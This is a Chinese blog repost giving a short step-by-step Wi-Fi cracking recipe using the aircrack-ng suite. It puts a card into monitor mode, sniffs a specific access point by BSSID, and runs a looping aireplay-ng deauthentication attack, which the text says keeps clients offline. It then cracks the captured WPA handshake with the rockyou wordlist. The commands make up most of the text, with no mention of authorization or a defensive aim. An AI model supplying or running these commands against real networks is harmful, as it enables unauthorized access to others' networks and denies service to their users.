码迷,mamicode.com
首页 > 其他好文 > 详细

aircrakf

时间:2018-05-03 22:42:29      阅读:256      评论:0      收藏:0      [点我收藏+]

标签:wifi   lists   share   cap   sts   ack   rdl   模式   冲突   

airmon-ng start wlan0

airodump-ng wlan0mon#find the wifi

airodump-ng -w yakoazz -c 1 --bssid BE:5F:F6:97:67:6B wlan0mon#-c is wifi channel, -w is name(any name is ok),-bssis is Mac
解释:–bssid嗅探指定无线AP,后面跟着AP的bssid,如下图

这时候可以等待握手包的获取。

为了加速握手包的获取,我们可以使用aireplay来给AP发送断开包:


aireplay-ng -0 0 -a BE:5F:F6:97:67:6B wlan0mon
解释:-0为模式中的一种:冲突攻击模式,后面跟发送次数(设置为0,则为循环攻击,不停的断开连接,客户端无法正常上网,-a 指定无线AP的mac地址,即为该无线网的bssid值,上图可以一目了然。
这时候我们在右上角可以看到WPA handshake字样,后面跟着bssid,即为抓到了该无线网的握手包,我们可以使用CTRL+C来停止嗅探握手包。

aircrack-ng yakoazz-03.cap -w /usr/share/wordlists/rockyou.txt

 

 

http://www.vuln.cn/2683

aircrakf

标签:wifi   lists   share   cap   sts   ack   rdl   模式   冲突   

原文地址:https://www.cnblogs.com/yakoazz/p/8987896.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!